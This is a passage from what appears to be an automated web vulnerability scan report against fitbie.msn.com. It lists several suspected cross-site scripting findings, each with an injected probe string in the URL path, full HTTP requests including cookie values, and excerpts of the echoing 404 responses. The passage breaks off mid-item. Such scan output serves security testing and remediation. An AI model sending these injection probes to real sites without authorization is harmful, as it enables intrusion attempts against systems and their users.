<a href="/flag/flag/favorites/default153c1';e1a3fda9046?destination=node%2Fdefault153c1';e1a3fda9046&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.79. http://fitbie.msn.com/sites/default/files/belly_off_th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/belly_off_th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf005'%3b07107bf5112 was submitted in the REST URL parameter 2. This input was echoed as cf005';07107bf5112 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultcf005'%3b07107bf5112/files/belly_off_th_0.jpg?1285890306 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:40 +0000
ETag: "1297607200-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:40 GMT
Date: Sun, 13 Feb 2011 14:26:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultcf005';07107bf5112?destination=node%2Fdefaultcf005';07107bf5112&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.80. http://fitbie.msn.com/sites/default/files/bicycling_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/bicycling_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7705'%3be822129f108 was submitted in the REST URL parameter 2. This input was echoed as d7705';e822129f108 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultd7705'%3be822129f108/files/bicycling_th.jpg?1286563952 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:02 +0000
ETag: "1297607402-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:03 GMT
Date: Sun, 13 Feb 2011 14:30:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd7705';e822129f108?destination=node%2Fdefaultd7705';e822129f108&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.81. http://fitbie.msn.com/sites/default/files/bride-slim-healthy-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/bride-slim-healthy-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ba9'%3be2714c5ba01 was submitted in the REST URL parameter 2. This input was echoed as 58ba9';e2714c5ba01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default58ba9'%3be2714c5ba01/files/bride-slim-healthy-th.jpg?1297456061 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:11 +0000
ETag: "1297607171-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:11 GMT
Date: Sun, 13 Feb 2011 14:26:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default58ba9';e2714c5ba01?destination=node%2Fdefault58ba9';e2714c5ba01&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.82. http://fitbie.msn.com/sites/default/files/cephas-after-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/cephas-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50274'%3b40f5c2961f6 was submitted in the REST URL parameter 2. This input was echoed as 50274';40f5c2961f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default50274'%3b40f5c2961f6/files/cephas-after-th.jpg?1294788044 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:40 +0000
ETag: "1297607200-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:40 GMT
Date: Sun, 13 Feb 2011 14:26:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default50274';40f5c2961f6?destination=node%2Fdefault50274';40f5c2961f6&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.83. http://fitbie.msn.com/sites/default/files/couple-eating-healthy-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/couple-eating-healthy-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2671'%3bbcb29dbbd1a was submitted in the REST URL parameter 2. This input was echoed as d2671';bcb29dbbd1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultd2671'%3bbcb29dbbd1a/files/couple-eating-healthy-th.jpg?1297186295 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:10 +0000
ETag: "1297607170-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:11 GMT
Date: Sun, 13 Feb 2011 14:26:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd2671';bcb29dbbd1a?destination=node%2Fdefaultd2671';bcb29dbbd1a&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.84. http://fitbie.msn.com/sites/default/files/crush-calories-workout-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/crush-calories-workout-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1090'%3be21a020cc9c was submitted in the REST URL parameter 2. This input was echoed as e1090';e21a020cc9c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaulte1090'%3be21a020cc9c/files/crush-calories-workout-th.jpg?1292964212 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:17 +0000
ETag: "1297607177-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:18 GMT
Date: Sun, 13 Feb 2011 14:26:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulte1090';e21a020cc9c?destination=node%2Fdefaulte1090';e21a020cc9c&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.85. http://fitbie.msn.com/sites/default/files/curtsy-salute-th_1.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/curtsy-salute-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b04'%3bea0f9356189 was submitted in the REST URL parameter 2. This input was echoed as 47b04';ea0f9356189 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default47b04'%3bea0f9356189/files/curtsy-salute-th_1.jpg?1293522424 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:57 +0000
ETag: "1297607397-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:58 GMT
Date: Sun, 13 Feb 2011 14:29:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
